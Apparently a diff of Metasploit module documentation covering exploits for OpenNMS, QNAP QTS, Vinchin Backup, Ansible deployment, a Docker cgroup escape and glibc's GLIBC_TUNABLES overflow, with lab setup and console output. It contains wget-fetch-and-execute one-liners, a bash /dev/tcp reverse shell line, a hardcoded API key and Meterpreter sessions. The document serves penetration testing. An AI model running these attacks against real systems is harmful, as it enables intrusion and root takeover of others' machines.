+[*] Started reverse TCP handler on 192.168.91.196:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] The target is OpenNMS version 31.0.7 and is likely vulnerable to CVE-2023-40315 and CVE-2023-0872.
+[+] The target appears to be vulnerable. User file has ROLE_FILESYSTEM_EDITOR privileges. Exploitation is likely possible via CVE-2023-40315.
+[*] Waiting 3 seconds for the changes to be saved...
+[+] Successfully escalated privileges by adding ROLE_ADMIN
+[*] Successfully edited notificationCommands.xml
+[*] Successfully edited destinationPaths.xml
+[*] Successfully edited notifications.xml
+[+] Successfully uploaded the payload to thwjtslfaqsg.bsh
+[*] Triggering the notification to execute the payload
+[*] Received expected response while triggering the payload. Please be patient, it may take a few seconds for the payload to execute.
+[*] Sending stage (3045380 bytes) to 172.20.0.2
+[*] Meterpreter session 1 opened (192.168.91.196:4444 -> 172.20.0.2:51914) at 2023-12-13 17:40:16 +0200
+[*] Attempting cleanup...
+
+meterpreter > getuid
+Server username: opennms
+
+```
@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+### Description
+There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and
+QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage
+(NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.
+
+The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.
+The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used
+during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully
+initialized, the quick.cgi component is disabled on the system.
+
+An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command
+injection, allowing the attacker to execute arbitrary commands on the device.
+
+### Setup
+Vulnerable firmware can be downloaded from:
+[TS-X64_20230926-5.1.2.2533.zip](https://download.qnap.com/Storage/TS-X64/TS-X64_20230926-5.1.2.2533.zip)
+In order to decrypt the firmware use the following script:
+[qnap-qts-fw-cryptor.py](https://gist.github.com/ulidtko/966277a465f1856109b2d2674dcee741)
+
+Unzip the archive:
+```
+user@dev:~/qnap/$ unzip TS-X64_20230926-5.1.2.2533.zip 
+Archive:  TS-X64_20230926-5.1.2.2533.zip
+  inflating: TS-X64_20230926-5.1.2.2533.img  
+```
+
+Decrypt the firmware:
+```
+user@dev:~/qnap/$ python3 qnap-qts-fw-cryptor.py d QNAPNASVERSION5 TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz
+Signature check OK, model TS-X64, version 5.1.2
+Encrypted 1048576 of all 220239236 bytes
+[99% left]
+[99% left]
+[99% left]
+...snip
+[02% left]
+[00% left]
+[00% left]
+user@dev:~/qnap/$ ls
+qnap-qts-fw-cryptor.py  TS-X64_20230926-5.1.2.2533.img  TS-X64_20230926-5.1.2.2533.tgz  TS-X64_20230926-5.1.2.2533.zip
+```
+
+Recreate the root file system:
+```
+user@dev:~/qnap/$ mkdir firmware
+user@dev:~/qnap/$ tar -xvzf TS-X64_20230926-5.1.2.2533.tgz -C ./firmware/
+user@dev:~/qnap/$ binwalk -e firmware/initrd.boot
+user@dev:~/qnap/$ binwalk -e firmware/_initrd.boot.extracted/0
+user@dev:~/qnap/$ binwalk -e firmware/rootfs2.bz
+user@dev:~/qnap/$ binwalk -e firmware/_rootfs2.bz.extracted/0
+user@dev:~/qnap/$ mv firmware/_rootfs2.bz.extracted/_0.extracted/* firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
+```
+
+To run the Firmware first copy the qemu-x86_64-static binary into the root file system folder:
+```
+user@dev:~/qnap/$ cd firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ cp $(which qemu-x86_64-static) .
+```
+
+Run _thttpd_ via QEMU:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ 
+sudo chroot . ./qemu-x86_64-static usr/local/sbin/_thttpd_ -p 8080  -nor -nos -u admin -d /home/httpd -c '**.*' -h 0.0.0.0 -i /var/lock/._thttpd_.pid
+```
+
+Verify the HTTP server is running:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo netstat -lnp | grep 8080
+tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      1195417/./qemu-x86_ 
+```
+
+At the time of writing `/dev/random` and `/dev/urandom` are required to be present in the environment in order to work
+around the following issue: https://github.com/rapid7/mettle/issues/255.
+Ensure the binaries exist on your system:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/random
+/dev/random
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/urandom
+/dev/urandom
+```
+
+Create files the files:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/random
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/urandom
+```
+
+Mount the binaries:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind  /dev/random  dev/random
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind  /dev/urandom  dev/urandom
+```
+
+Drop to a shell via QEMU:
+```
+user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo chroot . /bin/sh
+```
+
+Enable the component quick.cgi:
+```
+sh-3.2# chmod +x /home/httpd/cgi-bin/quick/quick.cgi
+```
+
+Fix a linker issue with QEMU:
+```
+sh-3.2# rm /lib/libnl-3.so.200
+sh-3.2# ln -s /lib/libnl-3.so.200.24.0 /lib/libnl-3.so.200
+```
+
+Create this folder as it will be present in a NAS device containing a hard drive:
+```
+sh-3.2# mkdir /mnt/HDA_ROOT
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use linux/http/qnap_qts_rce_cve_2023_47218`
+1. Set the following options: `RHOST`, `RPORT`, `LHOST` and `FETCH_SRVPORT` if 8080 is already in use.
+1. Run the module
+1. Receive a Meterpreter session as the `admin` user.
+
+## Scenarios
+### TS-X64_20230926-5.1.2.2533 firmware emulated via qemu using the steps above.
+```
+msf6 > use linux/http/qnap_qts_rce_cve_2023_47218
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set rport 8080
+rport => 8080
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set lhost 172.16.199.158
+lhost => 172.16.199.158
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > set fetch_srvport 8085
+fetch_srvport => 8085
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > options
+
+Module options (exploit/linux/http/qnap_qts_rce_cve_2023_47218):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.16.199.130   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasp
+                                       loit/basics/using-metasploit.html
+   RPORT    8080             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
+                                                  , WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      mvcWDkBxSOK      no        Name to use on remote system when storing payload; cannot
+                                                  contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8085             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /mnt/update      yes       Remote writable dir to store payload; cannot contain space
+                                                  s.
+   LHOST               172.16.199.158   yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/qnap_qts_rce_cve_2023_47218) > run
+
+[*] Started reverse TCP handler on 172.16.199.158:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Sending stage (3045380 bytes) to 172.16.199.130
+[+] Deleted /mnt/update/RjzvVkLp
+[+] Deleted /mnt/update/"$($(echo -n YmFzaCAvbW50L3VwZGF0ZS9Sanp2VmtMcA==|base64 -d))"
+[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.16.199.130:40004) at 2024-02-15 12:20:04 -0900
+
+meterpreter > getuid
+Server username: admin
+meterpreter > sysinfo
+Computer     : 172.16.199.130
+OS           :  (Linux 6.2.0-35-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,170 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.x, 6.0.x, 6.7.x, and 7.0.x. To prepare the environment:
+
+1. Download Vinchin Backup & Recovery version 5.0.x, 6.0.x, 6.7.x, or 7.0.x.
+2. Install the software on a Linux-based server using the downloaded ISO.
+3. During the installation, ensure that the network interface is active and configured.
+4. After installation, verify that the Vinchin Backup & Recovery service is operational and accessible over the network.
+
+*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.*
+
+## Verification Steps
+
+1. Install a vulnerable version of Vinchin Backup & Recovery (versions 5.0.x, 6.0.x, 6.7.x, or 7.0.x).
+2. Start msfconsole in your Metasploit environment.
+3. Do: `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`
+4. Set the RHOSTS to the target IP address or hostname.
+5. Do: `run`
+6. If the target is vulnerable, the exploit will execute the specified payload or command.
+
+## Options
+
+Here are the specific options for the `exploit/linux/http/vinchin_backup_recovery_cmd_inject` module:
+
+#### RHOSTS
+
+- **Description**: Specifies the target address or range of addresses.
+- **Default Value**: None. It must be set by the user.
+
+#### RPORT
+
+- **Description**: The port on which the Vinchin Backup & Recovery service is running.
+- **Default Value**: 443 (this is not configurable in the default Vinchin Backup & Recovery setup).
+
+#### SSL
+
+- **Description**: Specifies whether to use SSL for the connection.
+- **Default Value**: True, as Vinchin typically runs over HTTPS.
+
+#### TARGETURI
+
+- **Description**: The base path to the Vinchin Backup & Recovery application.
+- **Default Value**: `/`
+
+#### APIKEY
+
+- **Description**: The hardcoded API key required to authenticate to the API.
+- **Default Value**: `6e24cc40bfdb6963c04a4f1983c8af71`
+
+## Scenarios
+
+### Successful Exploitation against Vinchin Backup & Recovery 7.0.1.26282
+
+This scenario demonstrates exploiting the Vinchin Backup & Recovery version 7.0.1.26282 on a Linux server.
+
+**Environment**:
+- Vinchin Backup & Recovery 7.0.1.26282
+- Linux Server
+- Metasploit Framework
+
+**Steps**:
+
+1. Start `msfconsole`.
+2. Load the exploit module:
+```
+use exploit/linux/http/vinchin_backup_recovery_cmd_inject
+```
+4. Set the required options:
+```
+set RHOSTS [target IP]
+set APIKEY [API Key]
+```
+5. Optionally set a payload and configure LHOST and LPORT.
+6. Execute the exploit:
+```
+exploit
+```
+
+**Expected Output**:
+
+```
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > options
+
+Module options (exploit/linux/http/vinchin_backup_recovery_cmd_inject):
+
+   Name       Current Setting               Required  Description
+   ----       ---------------               --------  -----------
+   APIKEY     6e24cc40bfdb6963c04a4f1983c8  yes       The hardcoded API key
+              af71
+   Proxies                                  no        A proxy chain of format type:host:port[,type:host:
+                                                      port][...]
+   RHOSTS                                   yes       The target host(s), see https://docs.metasploit.co
+                                                      m/docs/using-metasploit/basics/using-metasploit.ht
+                                                      ml
+   RPORT      443                           yes       The target port (TCP)
+   SSL        true                          no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                  no        Path to a custom SSL certificate (default is rando
+                                                      mly generated)
+   TARGETURI  /                             yes       The base path to the Vinchin Backup & Recovery app
+                                                      lication
+   URIPATH                                  no        The URI to use for this exploit (default is random
+                                                      )
+   VHOST                                    no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                        address on the local machine or 0.0.0.0 to listen on all address
+                                       es.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting            Required  Description
+   ----                ---------------            --------  -----------
+   FETCH_COMMAND       CURL                       yes       Command to fetch payload (Accepted: CURL, FT
+                                                            P, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false                      yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      JSSwiKfcOw                 no        Name to use on remote system when storing pa
+                                                            yload; cannot contain spaces.
+   FETCH_SRVHOST                                  no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080                       yes       Local port to use for serving payload
+   FETCH_URIPATH                                  no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /usr/share/nginx/vinchin/  yes       Remote writable dir to store payload; cannot
+                       tmp                                   contain spaces.
+   LHOST               192.168.1.5                yes       The listen address (an interface may be spec
+                                                            ified)
+   LPORT               4444                       yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set rhosts 192.168.1.3
+rhosts => 192.168.1.3
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
+
+[*] Detected Vinchin version: 7.0.1.26282
+[+] 192.168.1.3:443 - The target is vulnerable.
+msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected Vinchin version: 7.0.1.26282
+[+] The target is vulnerable.
+[*] Sending stage (3045380 bytes) to 192.168.1.3
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.3:58960) at 2023-11-21 02:00:57 +0100
+
+meterpreter > sysinfo 
+Computer     : localhost.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
+
+Note: All instances of this exploit can be subject to privilege escalation using the
+`exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` module in the Metasploit environment.
@@ -0,0 +1,189 @@
+## Vulnerable Application
+
+This exploit module creates an ansible module for deployment to nodes in the network.
+It creates a new yaml playbook which copies our payload, chmods it, then runs it on all
+targets which have been selected (default all).
+
+### Docker-compose Install
+
+Use the ansible lab files located [here](https://github.com/abdennour/ansible-lab-environment-in-containers).
+
+Before bringing up the `docker-compose` instance, you'll want to generate an SSH key: `ssh-keygen -t rsa -N "" -f secrets/id_rsa`
+
+Of note, only 1 of the 3 alpine hosts will be successful due to the port conflict. This is fine though.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use exploit/linux/local/ansible_node_deployer`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should get sessions on all the targeted hosts
+
+## Options
+
+### ANSIBLEPLAYBOOK
+
+Location of ansible executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/local/bin/ansible`. Defaults to ``
+
+### WritableDir
+
+A directory on the compromised host we can write our payload to. Defaults to `/tmp`
+
+### TargetWritableDir
+
+A directory on the target hosts we can write our payload to. Defaults to `/tmp`
+
+### CALCULATE
+
+This will calculate how many hosts may be exploitable by using Ansible's ping command.
+
+### HOSTS
+
+Which Ansible host (groups) to target. Defaults to `all`
+
+### ListenerTimeout
+
+How many seconds to wait after executing the payload for hosts to call back.
+If set to `0`, wait forever. Defaults to `60`
+
+## Scenarios
+
+### Docker compose as mentioned above
+
+Get initial access to the system
+
+```
+resource (ansible_deploy.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (ansible_deploy.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (ansible_deploy.rb)> set srvport 8181
+srvport => 8181
+resource (ansible_deploy.rb)> set target 7
+target => 7
+resource (ansible_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (ansible_deploy.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/2BQIMgeywC6gGt9
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO OHZQobFE --no-check-certificate http://1.1.1.1:8181/2BQIMgeywC6gGt9; chmod +x OHZQobFE; ./OHZQobFE& disown
+[*] 172.22.0.7       web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.7
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.22.0.7:49612) at 2023-12-15 20:12:27 -0500
+```
+
+```
+resource (ansible_deploy.rb)> use exploit/linux/local/ansible_node_deployer
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (ansible_deploy.rb)> set session 1
+session => 1
+resource (ansible_deploy.rb)> set verbose true
+verbose => true
+resource (ansible_deploy.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (ansible_deploy.rb)> set lport 9999
+lport => 9999
+[*] Starting persistent handler(s)...
+[msf](Jobs:1 Agents:0) exploit(linux/local/ansible_node_deployer) > 
+[msf](Jobs:1 Agents:1) exploit(linux/local/ansible_node_deployer) > set TargetWritableDir /etc/
+TargetWritableDir => /etc/
+[msf](Jobs:1 Agents:1) exploit(linux/local/ansible_node_deployer) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/local/ansible_node_deployer) > 
+[*] Started reverse TCP handler on 1.1.1.1:9999 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] /tmp is writable, and ansible executable found
+[+] The target is vulnerable.
+[+] Stored pings to: /root/.msf4/loot/20231215201340_default_172.22.0.7_ansible.ping_422232.txt
+[+] Ansible Pings
+=============
+
+ Host                       Status   Ping  Changed
+ ----                       ------   ----  -------
+ alpine-example-com         SUCCESS  pong  false
+ alpinesystemd-example-com  SUCCESS  pong  false
+ centos7-example-com        SUCCESS  pong  false
+ rhel8-example-com          SUCCESS  pong  false
+
+[+] 4 ansible hosts were pingable, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
+[*] Creating yaml job to execute
+[*] Writing payload
+[*] Writing '/tmp/O514h2N' (250 bytes) ...
+[*] Executing ansible job
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.6
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.4
+[+] Stored run logs to: /root/.msf4/loot/20231215201411_default_172.22.0.7_ansible.playbook_967421.txt
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.5
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.2
+[*] Meterpreter session 2 opened (1.1.1.1:9999 -> 172.22.0.6:60850) at 2023-12-15 20:14:36 -0500
+[*] Meterpreter session 5 opened (1.1.1.1:9999 -> 172.22.0.2:34980) at 2023-12-15 20:14:36 -0500
+[*] Meterpreter session 3 opened (1.1.1.1:9999 -> 172.22.0.4:51082) at 2023-12-15 20:14:46 -0500
+[*] Meterpreter session 4 opened (1.1.1.1:9999 -> 172.22.0.5:41770) at 2023-12-15 20:14:56 -0500
+
+[msf](Jobs:2 Agents:5) exploit(linux/local/ansible_node_deployer) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information        Connection
+  --  ----  ----                   -----------        ----------
+  1         meterpreter x64/linux  root @ 172.22.0.7  1.1.1.1:4444 -> 172.22.0.7:49612 (172.22.0.7)
+  2         meterpreter x64/linux  root @ 172.22.0.6  1.1.1.1:9999 -> 172.22.0.6:60850 (172.22.0.6)
+  3         meterpreter x64/linux  root @ 172.22.0.4  1.1.1.1:9999 -> 172.22.0.4:51082 (172.22.0.4)
+  4         meterpreter x64/linux  root @ 172.22.0.5  1.1.1.1:9999 -> 172.22.0.5:41770 (172.22.0.5)
+  5         meterpreter x64/linux  root @ 172.22.0.2  1.1.1.1:9999 -> 172.22.0.2:34980 (172.22.0.7)
+```
+
+```
+└─$ cat ~/.msf4/loot/20231215201411_default_172.22.0.7_ansible.playbook_967421.txt
+
+PLAY [Deliver Meterpreter] *****************************************************
+
+TASK [Gathering Facts] *********************************************************
+[DEPRECATION WARNING]: Distribution redhat 8.2 on host rhel8-example-com should
+ use /usr/libexec/platform-python, but is using /usr/bin/python for backward 
+compatibility with prior Ansible releases. A future Ansible release will 
+default to using the discovered platform python for this host. See https://docs
+.ansible.com/ansible/2.9/reference_appendices/interpreter_discovery.html for 
+more information. This feature will be removed in version 2.12. Deprecation 
+warnings can be disabled by setting deprecation_warnings=False in ansible.cfg.
+ok: [rhel8-example-com]
+ok: [centos7-example-com]
+[WARNING]: Platform linux on host alpine-example-com is using the discovered
+Python interpreter at /usr/bin/python, but future installation of another
+Python interpreter could change this. See https://docs.ansible.com/ansible/2.9/
+reference_appendices/interpreter_discovery.html for more information.
+ok: [alpine-example-com]
+[WARNING]: Platform linux on host alpinesystemd-example-com is using the
+discovered Python interpreter at /usr/bin/python, but future installation of
+another Python interpreter could change this. See https://docs.ansible.com/ansi
+ble/2.9/reference_appendices/interpreter_discovery.html for more information.
+ok: [alpinesystemd-example-com]
+
+TASK [ansible.builtin.copy] ****************************************************
+changed: [alpine-example-com]
+changed: [centos7-example-com]
+changed: [rhel8-example-com]
+changed: [alpinesystemd-example-com]
+
+TASK [ansible.builtin.file] ****************************************************
+changed: [alpine-example-com]
+changed: [rhel8-example-com]
+changed: [centos7-example-com]
+changed: [alpinesystemd-example-com]
+
+TASK [command] ***************************************************************** 
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
+If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
+
+A vulnerability was found in the Linux kernel's `cgroup_release_agent_write` in the `kernel/cgroup/cgroup-v1.c` function.
+This flaw, under certain circumstances, allows the use of the cgroups v1 `release_agent` feature to escalate privileges
+and bypass the namespace isolation unexpectedly.
+
+More simply put, cgroups v1 has a feature called `release_agent` that runs a program when a process in the cgroup terminates.
+If `notify_on_release` is enabled, the kernel runs the `release_agent` binary as root. By editing the release_agent file,
+an attacker can execute their own binary with elevated privileges, taking control of the system. However, the `release_agent`
+file is owned by root, so only a user with root access can modify it.
+
+### Docker Setup
+
+`sudo docker run --rm -it --privileged ubuntu:20.04 bash`
+
+or
+
+`sudo docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu:20.04 bash`
+
+You may want to install `wget` to make initial exploitation easier as well:
+
+```
+apt-get update
+apt-get install -y wget
+```
+
+## Verification Steps
+
+1. Install Docker and start a docker container
+2. Start msfconsole
+3. Get a shell on the docker image as root. 
+4. Do: `use exploit/linux/local/docker_cgroup_escape`
+5. Do: `set lhost [ip]`
+6. Do: `set session [#]`
+7. Do: `run`
+8. You should get a root shell on the host OS.
+
+## Options
+
+## Scenarios
+
+### Ubuntu 18.04 LTS with 4.15.0-96-generic kernel and Docker Ubuntu 20.04
+
+Initial Access
+
+```
+resource (docker.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (docker.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (docker.rb)> set srvport 8181
+srvport => 8181
+resource (docker.rb)> set target 7
+target => 7
+resource (docker.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (docker.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/QZWpVr8t
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO dLFtachL --no-check-certificate http://1.1.1.1:8181/QZWpVr8t; chmod +x dLFtachL; ./dLFtachL& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
+[*] 2.2.2.2    web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60288) at 2023-11-28 13:38:39 -0500
+
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/) > getuid
+Server username: root
+(Meterpreter 1)(/) > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 20.04 (Linux 4.15.0-96-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+Exploit the Docker Escape
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/docker_cgroup_escape
+[*] Using configured payload cmd/unix/reverse_bash
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set lport 9988
+lport => 9988
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set verbose true
+verbose => true
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/local/docker_cgroup_escape) > run
+
+[+] bash -c '0<&181-;exec 181<>/dev/tcp/1.1.1.1/9988;sh <&181 >&181 2>&181'
+[*] Started reverse TCP handler on 1.1.1.1:9988 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Unable to determine host OS, this check method is unlikely to be accurate if the host isn't Ubuntu
+[+] The target is vulnerable. IF host OS is Ubuntu, kernel version 4.15.0-96-generic is vulnerable
+[*] Creating folder for mount: /tmp/eH7EY
+[*] Creating directory /tmp/eH7EY
+[*] /tmp/eH7EY created
+[*] Mounting cgroup
+[*] Creating folder in cgroup for exploitation: /tmp/eH7EY/qe0oj7G
+[*] Creating directory /tmp/eH7EY/qe0oj7G
+[*] /tmp/eH7EY/qe0oj7G created
+[*] Enabling notify on release for group qe0oj7G
+[*] Determining the host OS path for image
+[*] Host OS path for image: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff
+[*] Setting release_agent path to: /var/lib/docker/overlay2/c8b82079007d1f6dcf042787cd450ffe045595be11c29ca5b119d1802cfaa22f/diff/tmp/KksBaCbF
+[*] Uploading payload to /tmp/KksBaCbF
+[*] Writing '/tmp/KksBaCbF' (88 bytes) ...
+[*] Triggering payload with command: sh -c "echo $$ > /tmp/eH7EY/qe0oj7G/cgroup.procs"
+[*] Command shell session 2 opened (1.1.1.1:9988 -> 2.2.2.2:54990) at 2023-11-28 14:39:10 -0500
+[*] Cleanup: Unmounting /tmp/eH7EY
+
+FDjfSpoVnqvGmrtBOSRfABBgFMmcSkbT
+id
+uid=0(root) gid=0(root) groups=0(root)
+cat /etc/os-release
+NAME="Ubuntu"
+VERSION="18.04 LTS (Bionic Beaver)"
+ID=ubuntu
+ID_LIKE=debian
+PRETTY_NAME="Ubuntu 18.04 LTS"
+VERSION_ID="18.04"
+HOME_URL="https://www.ubuntu.com/"
+SUPPORT_URL="https://help.ubuntu.com/"
+BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
+PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
+VERSION_CODENAME=bionic
+UBUNTU_CODENAME=bionic
+```
@@ -0,0 +1,169 @@
+## Vulnerable Application
+
+A buffer overflow was exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment
+variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when
+launching binaries with SUID permission to execute code in the context of the root user. 
+
+This module targets glibc packaged on Ubuntu and Debian. The specific versions this module targets are:
+
+Ubuntu:
+2.35-0ubuntu3.4 > 2.35
+2.37-0ubuntu2.1 > 2.37
+2.38-1ubuntu6 > 2.38
+
+Debian: 
+2.31-13-deb11u7 > 2.31
+2.36-9-deb12u3 > 2.36
+
+Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911
+however this module does not target them.  
+
+### Description
+
+The GLIBC_TUNABLES environment variable is parsed in a loop and is expected to be provided in the following format:
+`tunable1=aaa:tunable2=bbb`. If the variable is sent in the following format: `tunable1=tunable2=AAA` due to the
+absence of the tunable delimiter `:` in the string, the value `tunable2=AAA` is handled incorrectly and results in a
+buffer overflow.
+
+### Setup
+
+Install [Ubuntu 22.04.3](https://releases.ubuntu.com/jammy/ubuntu-22.04.3-desktop-amd64.iso) while ensuring the VM does 
+not have internet access. 
+
